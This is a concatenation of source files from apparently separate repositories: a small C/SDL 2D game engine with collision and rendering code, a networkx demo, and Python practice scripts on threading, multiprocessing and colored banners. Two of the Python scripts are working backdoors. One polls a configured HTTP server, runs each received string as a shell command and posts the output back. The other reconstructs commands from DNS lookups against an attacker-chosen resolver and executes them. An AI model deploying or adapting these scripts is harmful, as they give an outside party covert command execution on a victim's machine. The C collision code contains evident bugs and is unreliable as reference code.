int w, h;
int is_trigger;
} Box_Collider;
Collision_Info box_collision(Component_Type *colliders, Component_Type *position, Box_Collider *active_collider,
int move_x, int move_y, unsigned int collision_ids_length);<file_sep>#pragma once
#include <SDL2/SDL.h>
#include <stdio.h>
Uint8 input_previous_keyboard_state[512];
Uint8 input_current_keyboard_state[512];
const Uint8 *input_keyboard_state_pointer;
int input_get_key_down(SDL_Scancode scancode);
int input_get_key(SDL_Scancode scancode);
int input_get_key_up(SDL_Scancode scancode);
typedef struct
{
SDL_Scancode scancode;
char *input_name;
} Game_Input;
Game_Input *game_inputs;
int number_of_game_inputs;
SDL_Scancode scancode_from_gi(const char *input_name, Game_Input *inputs, int length);
int get_input_down(const char *input_name);
int get_input(const char *input_name);
int get_input_up(const char *input_name);<file_sep>#pragma once
#include <SDL2/SDL.h>
#include "input.h"
SDL_Window *window;
SDL_Renderer *renderer;
double read_timer_dt(void);
int engine_init(void);
void engine_cleanup(void);
void loop(void);
int running;<file_sep>#pragma once
//#include "box_collider.h"
#include "../../component.h"
#include "collision_info.h"
typedef struct
{
int entity_id;
unsigned int grid_width;
unsigned int grid_height;
unsigned int cell_width;
unsigned int cell_height;
int *collision_ids;
} Grid_Collider;
Collision_Info grid_collision(Component_Type *grid_collider, Component_Type *position,
Box_Collider *box_collider, int move_x, int move_y);<file_sep>#pragma once
#include "../../component.h"
#include "sprite.h"
typedef struct
{
int entity_id;
unsigned int map_width;
unsigned int map_height;
int *sprite_ids;
Sprite *sprite;
} Tilemap;
void render_tilemap(Component_Type *cmp_type, Component_Type *pos);<file_sep>EXEC = game.app
CC = gcc
EXTENSION = c
SRCS_DIR = src
LFLAGS += -lm -lsdl2 -lsdl2_image -lsdl2_ttf
SRCS = $(shell find $(SRCS_DIR) -type f -name *.$(EXTENSION))
all:
CC $(SRCS) -o $(EXEC) $(LFLAGS)
run:
./$(EXEC)<file_sep>#include "input.h"
// Returns true if key was pressed this frame
int input_get_key_down(SDL_Scancode scancode)
{
if(input_current_keyboard_state[scancode] && !input_previous_keyboard_state[scancode])
{
return 1;
}
return 0;
}
// Returns true of key is pressed
int input_get_key(SDL_Scancode scancode)
{
if(input_current_keyboard_state[scancode])
{
return 1;
}
return 0;
}
// Returns true if key was released this frame
int input_get_key_up(SDL_Scancode scancode)
{
if(!input_current_keyboard_state[scancode] && input_previous_keyboard_state[scancode])
{
return 1;
}
return 0;
}
// The following functions provide a layer of abstraction that allows for
// keybinding and alternative input methods (controllers).
SDL_Scancode scancode_from_gi(const char *input_name, Game_Input *inputs, int length)
{
for(int i = 0; i < length; i++)
{
if(inputs[i].input_name == input_name)
{
return inputs[i].scancode;
}
}
return NULL;
}
int get_input_down(const char *input_name)
{
SDL_Scancode sc = scancode_from_gi(input_name, game_inputs, number_of_game_inputs);
return input_get_key_down(sc);
}
int get_input(const char *input_name)
{
SDL_Scancode sc = scancode_from_gi(input_name, game_inputs, number_of_game_inputs);
return input_get_key(sc);
}
int get_input_up(const char *input_name)
{
SDL_Scancode sc = scancode_from_gi(input_name, game_inputs, number_of_game_inputs);
return input_get_key_up(sc);
}<file_sep>int hash(int key, int array_length)
{
long l = 2654435769;
return (key * l >> 32) % array_length;
}<file_sep>#pragma once
typedef struct
{
int modified_move_x;
int modified_move_y;
int *collided_ids;
} Collision_Info;<file_sep>#pragma once
typedef struct
{
int enitity_id;
int hp;
} Health;<file_sep>#include <stdio.h>
#include "engine.h"
#include "game.h"
// Article which explains time steps: https://gafferongames.com/post/fix_your_timestep/
static double timer_last;
static double timer_now;
static double timer_dt;
static double timer_fixed_dt;
static double timer_accumulator;
double read_timer_dt(void) { return timer_dt; }
static void events(SDL_Event event)
{
// Handle all events, making sure previous and current input states are updated properly
memcpy(input_previous_keyboard_state, input_current_keyboard_state, 512);
while(SDL_PollEvent(&event))
{
if(event.type == SDL_QUIT)
{
printf("Quit\n");
running = 0;
break;
}
}
memcpy(input_current_keyboard_state, input_keyboard_state_pointer, 512);
}
static void render(void)
{
SDL_RenderClear(renderer);
game_render();
SDL_RenderPresent(renderer);
}
void loop(void)
{
timer_now = SDL_GetTicks();
SDL_Event event;
running = 1;
while(running)
{
printf("%s", SDL_GetError());
timer_last = timer_now;
timer_now = SDL_GetTicks();
timer_dt = (timer_now - timer_last)/1000;
timer_accumulator += timer_dt;
while (timer_accumulator >= timer_fixed_dt)
{
events(event);
game_update();
timer_accumulator -= timer_fixed_dt;
}
render();
}
}
int engine_init(void)
{
int window_width = 2560;
int window_height = 1440;
int target_render_width = 256;
int target_render_height = 144;
// Init SDL
if(SDL_Init(SDL_INIT_EVERYTHING) == -1)
{
printf("Failed to initialize SDL: %s\n", SDL_GetError());
return 1;
}
// Create window
window = SDL_CreateWindow("Game", SDL_WINDOWPOS_UNDEFINED, SDL_WINDOWPOS_UNDEFINED,
window_width, window_height, SDL_WINDOW_MAXIMIZED);
if(window == NULL)
{
printf("Failed to create window: %s\n", SDL_GetError());
return 1;
}
// Create renderer
renderer = SDL_CreateRenderer(window, -1, 0);
if(renderer == NULL)
{
printf("Failed to create renderer %s\n", SDL_GetError());
return 1;
}
// Set size of renderer to the same as window
SDL_RenderSetLogicalSize(renderer, target_render_width, target_render_height);
SDL_RenderSetIntegerScale(renderer, SDL_TRUE);
SDL_SetRenderDrawColor(renderer, 0, 0, 0, 0);
input_keyboard_state_pointer = SDL_GetKeyboardState(NULL);
// Init timer
timer_now = SDL_GetTicks();
timer_last = 0;
timer_dt = 0;
timer_fixed_dt = 1.0/60;
timer_accumulator = 0;
return 0;
}
void engine_cleanup(void)
{
SDL_DestroyRenderer(renderer);
SDL_DestroyWindow(window);
SDL_Quit();
}<file_sep>#pragma once
typedef struct
{
void **data;
int *hashmap;
int length; // TODO: Change name to max_length
int real_length;
} Component_Type;
typedef struct
{
Component_Type health;
Component_Type position;
Component_Type anim_controller;
Component_Type tilemap;
Component_Type grid_collider;
} Components;
Components *components;
Component_Type init_component_type(int length);
void add_component(Component_Type *component_type, void *component_data, int entity_id);
void remove_component(Component_Type *component_type, int entity_id);
void *get_component(Component_Type *component_type, int entity_id);
#include "modules/health.h"
#include "modules/position.h"
#include "modules/rendering/animation.h"
#include "modules/rendering/tilemap.h"
#include "modules/collision/box_collider.h"
<file_sep>#include "engine.h"
#include "game.h"
int main()
{
engine_init();
game_init();
loop();
game_cleanup();
engine_cleanup();
return 0;
}<file_sep>#include "tilemap.h"
void render_tilemap(Component_Type *cmp_type, Component_Type *pos)
{
for(int i = 0 ; i < cmp_type->real_length; i++)
{
Tilemap *target = cmp_type->data[i];
//Position *target_pos = get_component(pos, target->entity_id);
// Temporary hack
Position *target_pos = get_component(pos, 32); // Hardcoded player pos id
int x = 0;
int y = 0;
if(target_pos)
{
x = target_pos->x;
y = target_pos->y;
}
render_sprite(target->sprite, target->sprite_ids, target->map_width,
target->map_height, x, y);
}
}<file_sep>Note: collision is currently broken so it has temporarily been disabled in the demo.
## About
Feather Engine is a lightweight 2D game engine.
Before I started working on this I was frustrated by the selection of existing game engines. Some of them produced bloated game builds, some had clunky interfaces or only supported scripting languages I didn't want use, and some just didn't have the underlying structure that I was looking for. So I had two options, I could settle for a less than ideal engine, or I could build my own idyllic engine from scratch. I chose the latter, and thus, Feather Engine was born. The engine has been re-written about four times now and is still an ongoing project, I'm currently working towards its first release.
Compile using the makefile - you'll need sdl2, sdl2_image and sdl2_ttf.
<file_sep>#pragma once
int hash(int key, int array_length);<file_sep>#include "sprite.h"
#include "../../engine.h"
void render_sprite(Sprite *sprite, int *tile_ids, unsigned int id_array_width,
unsigned int id_array_height, int pos_x, int pos_y)
{
for(int x = 0; x < id_array_width; x++)
{
for(int y = 0; y < id_array_height; y++)
{
int id = tile_ids[(y * id_array_width) + x];
sprite->src.x = (int)(id % sprite->number_of_tiles_horizontal) * sprite->tile_width;
sprite->src.y = (int)floor(id / sprite->number_of_tiles_horizontal) * sprite->tile_height;
sprite->dst.x = x * sprite->tile_width + pos_x;
sprite->dst.y = y * sprite->tile_height + pos_y;
SDL_RenderCopy(renderer, sprite->tex, &sprite->src, &sprite->dst);
}
}
}<file_sep>#pragma once
typedef struct
{
int entity_id;
int x;
int y;
} Position; <file_sep>#pragma once
#include <SDL2/SDL.h>
typedef struct
{
unsigned int tile_width, tile_height;
unsigned int number_of_tiles_horizontal, number_of_tiles_vertical;
SDL_Texture *tex;
SDL_Rect src;
SDL_Rect dst;
} Sprite;
void render_sprite(Sprite *sprite, int *tile_ids ,unsigned int id_array_width,
unsigned int id_array_height, int pos_x, int pos_y);<file_sep>#include "animation.h"
#include "../../engine.h"
#include "../../component.h"
#include <stdio.h>
void update_anim(Component_Type *cmp_type)
{
// animation speedup glitch is caused by timer accumulator in engine.c
// - this has been fixed by moving anim update into the render loop but I might want to look further into it
for(int i = 0; i < cmp_type->real_length; i++)
{
Anim_Controller *target = cmp_type->data[i];
target->anims[target->anim_id].dt_accumulator += read_timer_dt();
if(target->anims[target->anim_id].dt_accumulator >= target->anims[target->anim_id].speed)
{
target->frame_id++;
target->anims[target->anim_id].dt_accumulator = 0;
}
if(target->frame_id >= target->anims[target->anim_id].frame_count)
{
if(!target->anims[target->anim_id].loop)
{
target->anim_id = target->default_anim_id;
}
target->frame_id = 0;//target->anims[target->anim_id].tile_ids[0];
}
}
}
void render_anim(Component_Type *cmp_type, Component_Type *pos)
{
for(int i = 0; i < cmp_type->real_length; i++)
{
Anim_Controller *target = cmp_type->data[i];
Position *target_pos = get_component(pos, target->entity_id);
int x = 0;
int y = 0;
if(target_pos)
{
x = target_pos->x;
y = target_pos->y;
}
// TODO: hacky solution
int *tile_ids = malloc(sizeof(int));
tile_ids[0] = target->anims[target->anim_id].tile_ids[target->frame_id];
render_sprite(target->sprite, tile_ids, 1, 1, x, y);
free(tile_ids);
}
}
<file_sep>#include <stdlib.h>
#include "grid_collider.h"
Collision_Info grid_collision(Component_Type *grid_collider, Component_Type *position,
Box_Collider *box_collider, int move_x, int move_y)
{
Collision_Info collision_info;
collision_info.modified_move_x = 0;
collision_info.modified_move_y = 0;
// Greater of the two movement vectors
int *greater_move_pointer;
int greater_move_abs = 0;
int greater_move_sign = 0;
int greater_move_step = 0;
int greater_move_step_remainder = 0;
int greater_directional_offset = 0;
int greater_variable_offset_1 = 0;
int greater_variable_offset_2 = 0;
int greater_multiplier = 0;
int greater_target_axis = 0;
int greater_target_cell_dimension = 0;
// Lesser of the two movement vectors
int *lesser_move_pointer;
int lesser_move_abs = 0;
int lesser_move_sign = 0;
int lesser_move_step = 0;
int lesser_directional_offset = 0;
int lesser_variable_offset_1 = 0;
int lesser_variable_offset_2 = 0;
int lesser_multiplier = 0;
int lesser_target_axis = 0;
int lesser_target_cell_dimension = 0;
for(int i = 0; i < grid_collider->real_length; i++)
{
Grid_Collider *target = grid_collider->data[i];
Position *target_pos = get_component(position, target->entity_id);
// Differentiate lesser and greater move
// This can be made more efficient
int abs_move_x = abs(move_x);
int abs_move_y = abs(move_y);
if(abs_move_x > abs_move_y)
{
// Greater values assignment
greater_move_pointer = &collision_info.modified_move_x;
greater_move_abs = abs_move_x;
greater_move_sign = (int)copysign(1, move_x);
greater_directional_offset = (greater_move_sign > 0) ? box_collider->x + box_collider->w : box_collider->x;
greater_variable_offset_1 = box_collider->x;
greater_variable_offset_2 = box_collider->x + box_collider->w;
greater_multiplier = 1;
greater_target_axis = target_pos->x;
greater_target_cell_dimension = target->cell_width;
// Lesser values assignment
lesser_move_pointer = &collision_info.modified_move_y;
lesser_move_abs = abs_move_y;
lesser_move_sign = (int)copysign(1, move_y);
lesser_directional_offset = (lesser_move_sign < 0) ? box_collider->y + box_collider->h : box_collider->y;
lesser_variable_offset_1 = box_collider->y;
lesser_variable_offset_2 = box_collider->y = box_collider->h;
lesser_multiplier = target->grid_width;
lesser_target_axis = target_pos->y;
lesser_target_cell_dimension = target->cell_height;
}
else
{
// Greater values assignment
greater_move_pointer = &collision_info.modified_move_y;
greater_move_abs = abs_move_y;
greater_move_sign = (int)copysign(1, move_y);
greater_directional_offset = (greater_move_sign < 0) ? box_collider->y + box_collider->h : box_collider->y;
greater_variable_offset_1 = box_collider->y;
greater_variable_offset_2 = box_collider->y + box_collider->h;
greater_multiplier = target->grid_width;
greater_target_axis = target_pos->y;
greater_target_cell_dimension = target->cell_height;
// Lesser values assignment
lesser_move_pointer = &collision_info.modified_move_x;
lesser_move_abs = abs_move_x;
lesser_move_sign = (int)copysign(1, move_x);
lesser_directional_offset = (lesser_move_sign > 0) ? box_collider->x + box_collider->w : box_collider->x;
lesser_variable_offset_1 = box_collider->x;
lesser_variable_offset_2 = box_collider->x = box_collider->w;
lesser_multiplier = 1;
lesser_target_axis = target_pos->x;
lesser_target_cell_dimension = target->cell_width;
}
// Find approproate x y movement steps
if(greater_move_abs != 0)
{
if(lesser_move_abs != 0)
{
// Both moves are non-zero
greater_move_step = (greater_move_abs + lesser_move_abs - 1) / lesser_move_abs;
greater_move_step_remainder = greater_move_abs - greater_move_abs / greater_move_step * greater_move_step;
lesser_move_step = 1;
}
else
{
// Only one move is non-zero
greater_move_step_remainder = greater_move_abs;
lesser_move_step = 0;
}
}
else
{
// Both moves are zero
return collision_info;
}
// Check collision on main body of move
int col_id_1 = 0;
int col_id_2 = 0;
for(int i = 0; i < lesser_move_abs; i++)
{
for(int g = 0; g < greater_move_step; g++)
{
// TODO: test move pointer
col_id_1 = target->collision_ids[(lesser_variable_offset_1 + *lesser_move_pointer - lesser_target_axis)
/ lesser_target_cell_dimension * lesser_multiplier
+ (greater_directional_offset + *greater_move_pointer - greater_target_axis)
/ greater_target_cell_dimension * greater_multiplier];
col_id_2 = target->collision_ids[(lesser_variable_offset_2 + *lesser_move_pointer - lesser_target_axis)
/ lesser_target_cell_dimension * lesser_multiplier
+ (greater_directional_offset + *greater_move_pointer - greater_target_axis)
/ greater_target_cell_dimension * greater_multiplier];
if(col_id_1 != 0 || col_id_2 != 0)
{
greater_move_step = 0;
greater_move_step_remainder = 0;
break;
}
*greater_move_pointer += 1 * greater_move_sign;
}
for(int l = 0; l < lesser_move_step; l++)
{
col_id_1 = target->collision_ids[(lesser_directional_offset + *lesser_move_pointer - lesser_target_axis)
/ lesser_target_cell_dimension * lesser_multiplier
+ (greater_variable_offset_1 + *greater_move_pointer - greater_target_axis)
/ greater_target_cell_dimension * greater_multiplier];
col_id_2 = target->collision_ids[(lesser_directional_offset + *lesser_move_pointer - lesser_target_axis)
/ lesser_target_cell_dimension * lesser_multiplier
+ (greater_variable_offset_2 + *greater_move_pointer - greater_target_axis)
/ greater_target_cell_dimension * greater_multiplier];
if(col_id_1 != 0 || col_id_2 != 0)
{
lesser_move_step = 0;
break;
}
*lesser_move_pointer += 1 * lesser_move_sign;
}
}
// Check collision on remainder of move
for(int gr = 0; gr < greater_move_step_remainder; gr++)
{
col_id_1 = target->collision_ids[(lesser_variable_offset_1 + *lesser_move_pointer - lesser_target_axis)
/ lesser_target_cell_dimension * lesser_multiplier
+ (greater_directional_offset + *greater_move_pointer - greater_target_axis)
/ greater_target_cell_dimension * greater_multiplier];
col_id_2 = target->collision_ids[(lesser_variable_offset_2 + *lesser_move_pointer - lesser_target_axis)
/ lesser_target_cell_dimension * lesser_multiplier
+ (greater_directional_offset + *greater_move_pointer - greater_target_axis)
/ greater_target_cell_dimension * greater_multiplier];
if(col_id_1 != 0 || col_id_2 != 0)
{
greater_move_step_remainder = 0;
break;
}
*greater_move_pointer += 1 * greater_move_sign;
}
for(int l = 0; l < lesser_move_step; l++)
{
col_id_1 = target->collision_ids[(lesser_directional_offset + *lesser_move_pointer - lesser_target_axis)
/ lesser_target_cell_dimension * lesser_multiplier
+ (greater_variable_offset_1 + *greater_move_pointer - greater_target_axis)
/ greater_target_cell_dimension * greater_multiplier];
col_id_2 = target->collision_ids[(lesser_directional_offset + *lesser_move_pointer - lesser_target_axis)
/ lesser_target_cell_dimension * lesser_multiplier
+ (greater_variable_offset_2 + *greater_move_pointer - greater_target_axis)
/ greater_target_cell_dimension * greater_multiplier];
if(col_id_1 != 0 || col_id_2 != 0)
{
lesser_move_step = 0;
break;
}
*lesser_move_pointer += 1 * lesser_move_sign;
}
//*lesser_move_pointer = 10;
move_x = collision_info.modified_move_x;
move_y = collision_info.modified_move_y;
}
return collision_info;
}<file_sep>#pragma once
#include "sprite.h"
#include "../../component.h"
typedef struct
{
unsigned int frame_count;
unsigned int *tile_ids; // ID's corresponding to tileset
double speed;
double dt_accumulator;
char loop;
} Anim;
typedef struct
{
int entity_id;
Sprite *sprite;
Anim *anims;
unsigned int anim_id;
unsigned int frame_id;
unsigned int default_anim_id;
} Anim_Controller;
void update_anim(Component_Type *cmp_type);
void render_anim(Component_Type *component, Component_Type *pos);<file_sep>#include "box_collider.h"
Collision_Info box_collision(Component_Type *colliders, Component_Type *position, Box_Collider *active_collider,
int move_x, int move_y, unsigned int collision_ids_length)
{
int move_sign_x = (int)copysign(1, move_x);
int move_sign_y = (int)copysign(1, move_y);
Collision_Info collision_info;
for(int i = 0; i < colliders->real_length; i++)
{
Box_Collider *target = colliders->data[i];
Position *target_pos = get_component(position, target->entity_id);
int iterative_move_x;
int iterative_move_y;
int collision_y_done;
int collision_x_done;
while(!collision_x_done && !collision_y_done)
{
if(abs(iterative_move_x) < abs(move_x) && !collision_x_done)
{
iterative_move_x += move_sign_x;
if(active_collider->x + iterative_move_x < target->x + target->w &&
active_collider->x + iterative_move_x + active_collider->w > target->x &&
active_collider->y + iterative_move_y < target->y + target->h &&
active_collider->x + iterative_move_y + active_collider->h + target->y)
{
if(!target->is_trigger)
{
iterative_move_x -= move_sign_x;
move_x = iterative_move_x;
collision_x_done = 1;
}
// TODO: add support for triggers
}
}
if(abs(iterative_move_y) < abs(move_y) && !collision_y_done)
{
iterative_move_y += move_sign_y;
if(active_collider->x + iterative_move_x < target->x + target->w &&
active_collider->x + iterative_move_x + active_collider->w > target->x &&
active_collider->y + iterative_move_y < target->y + target->h &&
active_collider->x + iterative_move_y + active_collider->h + target->y)
{
if(!target->is_trigger)
{
iterative_move_y -= move_sign_y;
move_y = iterative_move_y;
collision_y_done = 1;
}
// TODO: add support for triggers
}
}
}
}
collision_info.modified_move_x = move_x;
collision_info.modified_move_y = move_y;
return collision_info;
} | 44100de57a97ef71e93cf351d55edbeed3de8578 | [
"Markdown",
"C",
"Makefile"
] | 25 | C | Bizbud/Feather-Engine | 967e3e705eed93d83a66f7faf4244a46951776f0 | 4dbcc989cbb7878ae8ca02b72e9d188fb2e4b13d |
refs/heads/master | <repo_name>JustinXiang/BarrageView<file_sep>/README.md
# BarrageView
一款自定义的可点击图文弹幕
因为项目需要,原版弹幕无法满足需求,专门修改的一款可以自定义修改弹幕视图的图文弹幕。

<file_sep>/app/src/main/java/read/it/myapplication/MainActivity.java
package read.it.myapplication;
import android.os.Handler;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import java.util.ArrayList;
import read.it.myapplication.widgets.Barrage;
import read.it.myapplication.widgets.BarrageView;
public class MainActivity extends AppCompatActivity implements BarrageView.PostPirset {
private BarrageView barrageview;
private Runnable runnable;
private boolean start=false;
ArrayList<Barrage> date=new ArrayList<>(); //弹幕数据
private Handler handler=new Handler();
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
findId();
init();
}
private void findId() {
barrageview = findViewById(R.id.barrageview);
}
private void init(){
barrageview.setContext(this);
barrageview.setPirset(this);
start=true;
startDanMu();
}
//弹幕点击接口。
@Override
public void postPirset(int post_id, int pirset) {
}
private void startDanMu(){
// danMuControl.addPicturDanMu(bean.account_avatar, bean.content.get(0).content, bean.is_praise);
runnable = new Runnable() {
@Override
public void run() {
for (int i = 0; i < 10; i++) {
date.add(new Barrage("http://img.mp.itc.cn/upload/20170306/aa50c412890a43fc96f364b7fe66e6e3_th.jpeg", "哈哈哈哈",0,i));
}
if(barrageview!=null) {
barrageview.setDateList(date);
if(start) {
handler.postDelayed(this, 10000);
}
}
}
};
runnable.run();
}
}
| 5b28e7c15fda68c9df47d4a4ebc169aa29064b9b | [
"Markdown",
"Java"
] | 2 | Markdown | JustinXiang/BarrageView | 9f1fe4a28ed59f172c77949f53e8dcd64f30031e | dd040dcb1daee5de0677810a3e2f0d4903aab6a0 |
refs/heads/main | <file_sep>const express=require('express');
const router=express.Router();
const Option=require('../models/option');
router.get('/', async(req,res)=>{
try {
const option=await Option.find();
res.send(option)
} catch (error) {
res.send('Error');
}
});
router.post('/',async(req,res)=>{
const option=new Option({
optiontext: req.body.optiontext,
questionid: req.body.questionid
})
try{
const a1=await option.save();
res.json(a1);
}
catch(err)
{
res.send(err);
}
});
router.get('/:id', async(req,res) => {
try{
const option = await Option.findById(req.params.id)
res.json(option)
}catch(err){
res.send('Error ' + err)
}
})
router.patch('/:id',async(req,res)=> {
try{
const option = await Option.findById(req.params.id)
option.optiontext= req.body.optiontext,
option.questionid= req.body.questionid
const a1 = await option.save()
res.json(a1)
}catch(err){
res.send('Error')
}
})
router.delete('/:id',async(req,res)=> {
try{
const option = await Option.findById(req.params.id)
const a1 = await option.remove()
res.json(a1)
}catch(err){
res.send('Error')
}
})
module.exports=router;<file_sep>const express=require('express');
const router=express.Router();
const Answer=require('../models/answer');
router.get('/', async(req,res)=>{
try {
const answer=await Answer.find();
res.send(answer)
} catch (error) {
res.send('Error');
}
});
router.post('/',async(req,res)=>{
const answer=new Answer({
answer:req.body.answer,
questionid:req.body.questionid
})
try{
const a1=await answer.save();
res.json(a1);
}
catch(err)
{
res.send(err);
}
});
router.get('/:id', async(req,res) => {
try{
const answer = await Answer.findById(req.params.id)
res.json(answer)
}catch(err){
res.send('Error ' + err)
}
})
router.patch('/:id',async(req,res)=> {
try{
const answer = await Answer.findById(req.params.id)
answer.answer= req.body.answer,
answer.questionid= req.body.questionid
const a1 = await answer.save()
res.json(a1)
}catch(err){
res.send('Error')
}
})
router.delete('/:id',async(req,res)=> {
try{
const answer = await Answer.findById(req.params.id)
const a1 = await answer.remove()
res.json(a1)
}catch(err){
res.send('Error')
}
})
module.exports=router; | aa542b9bf012bbaf36ef4fe82b9e432a61170f55 | [
"JavaScript"
] | 2 | JavaScript | praveen264/Codenx | a18544b76277b09bd3651ffc09c882ee84277c08 | 45d127627cf9ef6a1102f2a175e33e9fb8c8ee35 |
refs/heads/master | <file_sep>import matplotlib.pyplot as plt
import networkx as nx
def draw_cycle_graph():
g = nx.cycle_graph(24)
pos = nx.spring_layout(G, iterations=200)
nx.draw(g, pos, node_color=range(24), node_size=800, cmap=plt.cm.Blues)
plt.show()
def main():
draw_cycle_graph()
if __name__ == '__main__':
main()
<file_sep>import requests
import subprocess
import time
SERVER = "Your Server is here"
PORT = 8080
URL = "http://{}:{}".format(SERVER, PORT)
def main():
while True:
req = requests.get(URL)
command = req.text
if 'terminate' in command:
break
else:
result = subprocess.Popen(command, shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if len(result.stderr.read()) == 0:
post_response = requests.post(url=URL,
data=result.stdout.read())
else:
post_response = requests.post(url=URL,
data=result.stderr.read())
time.sleep(2)
if __name__ == '__main__':
main()
<file_sep>import logging
import concurrent.futures
# logging.basicConfig(
# level=logging.DEBUG, format='%(threadName)s: %(message)s'
# )
logging.basicConfig(
level=logging.DEBUG, format='%(processName)s: %(message)s'
)
def worker(x, y):
logging.debug('start')
r = x * y
logging.debug(r)
logging.debug('end')
return r
def sample_threading():
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
f1 = executor.submit(worker, 2, 5)
f2 = executor.submit(worker, 2, 5)
logging.debug(f1.result())
logging.debug(f2.result())
# map sample
args = [[2, 2], [5, 5]]
r = executor.map(worker, *args)
logging.debug(r)
logging.debug([i for i in r])
def sample_multiprocessing():
with concurrent.futures.ProcessPoolExecutor(max_workers=5) as executor:
f1 = executor.submit(worker, 2, 5)
f2 = executor.submit(worker, 2, 5)
logging.debug(f1.result())
logging.debug(f2.result())
# map sample
args = [[2, 2], [5, 5]]
r = executor.map(worker, *args)
logging.debug(r)
logging.debug([i for i in r])
def main():
# sample_threading()
sample_multiprocessing()
if __name__ == '__main__':
main()
<file_sep>import queue
from multiprocessing.managers import BaseManager
queue = queue.Queue()
class QueueManager(BaseManager):
pass
def main():
QueueManager.register(
'get_queue', callable=lambda: queue
)
manager = QueueManager(
address=('127.0.0.1', 50000),
authkey=b'basemanager'
)
server = manager.get_server()
server.serve_forever()
if __name__ == '__main__':
main()
<file_sep>BANNER = '''
{a} _____{b} _____{c} __ {d} _____{e} __ __ {f} _____{g} _____{h} __{i} _____{j} _____
{a}| __{b}| {c}| | {d}| | {e}| | | {f}| {g}| _ {h}|__| {i}| {j}| __ |
{a}|__ {b}|- -{c}| |__{d}| -{e}|_ _| {f}| | | {g}| {h}| | {i}| | {j}| -|
{a}|_____{b}|_____{c}|_____{d}|__|__|{e} |_| {f}|_|_|_{g}|__|__{h}|_____{i}|_____{j}|__|__|
'''
class Color:
BLACK = '\033[30m'
RED = '\033[31m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
BLUE = '\033[34m'
PURPLE = '\033[35m'
CYAN = '\033[36m'
WHITE = '\033[37m'
END = '\033[0m'
BOLD = '\038[1m'
UNDERLINE = '\033[4m'
INVISIBLE = '\033[08m'
REVERCE = '\033[07m'
def main():
print(BANNER.format(
a=Color.RED,
b=Color.YELLOW,
c=Color.GREEN,
d=Color.CYAN,
e=Color.BLUE,
f=Color.RED,
g=Color.YELLOW,
h=Color.GREEN,
i=Color.CYAN,
j=Color.BLUE
))
if __name__ == '__main__':
main()
<file_sep># -*- coding: utf-8 -*-
import dns.resolver
import subprocess
import time
DOMAIN_SERVER = 'Cache DNS Server is here'
DOMAIN_SERVER_PORT = 53
DOMAIN = 'your domain is here'
TRIGGER_HOST = '0x300x310x300x310x300x31' + DOMAIN
def can_be_resolved(host):
resolver = dns.resolver.Resolver()
resolver.nameservers = [DOMAIN_SERVER]
resolver.nameserver_ports = {DOMAIN_SERVER: DOMAIN_SERVER_PORT}
try:
answers = resolver.query(qname=host, rdtype='A')
except:
return False
if len(answers) >= 1:
return True
else:
return False
def get_command():
start_num = 0x61 # a
loop_num = start_num # a
end_num = 0x7a # z
resoloved_hostname = ''
ret_command = ''
while True:
hostname = resoloved_hostname + str(hex(loop_num)) + DOMAIN
if can_be_resolved(hostname):
resoloved_hostname += str(hex(loop_num))
ret_command += chr(loop_num)
loop_num = start_num
continue
if loop_num == end_num:
break
else:
loop_num += 1
print('resolved_name_host : ', resoloved_hostname + DOMAIN)
return ret_command
def execute_command(command):
print('command : ', command)
result = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
return result.stdout.read()
def report_to_server(result):
print('result : ', result)
# Communication to the report server add here.
def main():
# interval_time >= TTL
interval_time = 10
while True:
for i in range(interval_time):
time.sleep(1)
print('\r[{}{}]'.format('*'*(i+1), '-'*(interval_time-(i+1))), end='')
if can_be_resolved(TRIGGER_HOST):
print('\n')
command = get_command()
result = execute_command(command)
report_to_server(result)
print('\n')
if __name__ == '__main__':
main()
<file_sep># practise_python
This repository is storage for practising programming in Python
<file_sep>import logging
import multiprocessing
import time
logging.basicConfig(
level=logging.DEBUG, format='%(processName)s: %(message)s'
)
def process(i):
logging.debug('start')
time.sleep(2)
logging.debug('end')
return i
def f():
with multiprocessing.Pool(5) as p:
print('Execute Sync Process')
logging.debug(p.apply(process, (0,)))
print('Execute Async Process')
p1 = p.apply_async(process, (1,))
p2 = p.apply_async(process, (2,))
p3 = p.apply_async(process, (3,))
logging.debug(p1.get())
logging.debug(p2.get())
logging.debug(p3.get())
def f2():
print("[*]map")
with multiprocessing.Pool(5) as p:
r = p.map(process, [1, 2, 3])
logging.debug('Executed')
logging.debug(r)
print("[*]map_async")
with multiprocessing.Pool(5) as p:
r = p.map_async(process, [1, 2, 3])
logging.debug('Executed')
logging.debug(r.get())
print("[*]imap")
with multiprocessing.Pool(5) as p:
r = p.imap(process, [1, 2, 3])
logging.debug([i for i in r])
def lock_process(data, lock):
logging.debug(id(data))
with lock:
i = data['x']
time.sleep(2)
data['x'] = i + 1
logging.debug(str(data) + str(id(data)))
def sample_lock():
data = {'x': 0}
print('data id :', id(data))
lock = multiprocessing.Lock()
# data is not shared , but id is the same.
t1 = multiprocessing.Process(target=lock_process, args=(data, lock))
t2 = multiprocessing.Process(target=lock_process, args=(data, lock))
t1.start()
t2.start()
t1.join()
t2.join()
logging.debug(str(data) + str(id(data)))
def process_pipe(conn):
conn.send(['message'])
time.sleep(5)
conn.close()
def sample_pipe():
parent_conn, child_conn = multiprocessing.Pipe()
p = multiprocessing.Process(target=process_pipe, args=(parent_conn, ))
p.start()
logging.debug(child_conn.recv())
def process_value_array(num, arr):
logging.debug(num)
num.value += 1.0
logging.debug(arr)
for i in range(len(arr)):
arr[i] *= 2
def sample_value_array():
num = multiprocessing.Value('f', 0.0)
arr = multiprocessing.Array('i', [1, 2, 3, 4, 5])
p1 = multiprocessing.Process(target=process_value_array, args=(num, arr))
p2 = multiprocessing.Process(target=process_value_array, args=(num, arr))
p1.start()
p2.start()
p1.join()
p2.join()
logging.debug(num.value)
logging.debug(arr[:])
def process_manager(l, d, n):
l.reverse()
d['x'] += 1
n.y += 1
def sample_manager():
# Manager is later than Value, Array.
with multiprocessing.Manager()as manager:
l = manager.list()
d = manager.dict()
n = manager.Namespace()
l.append(1)
l.append(2)
l.append(3)
d['x'] = 0
n.y = 0
p1 = multiprocessing.Process(target=process_manager, args=(l, d, n))
p2 = multiprocessing.Process(target=process_manager, args=(l, d, n))
p1.start()
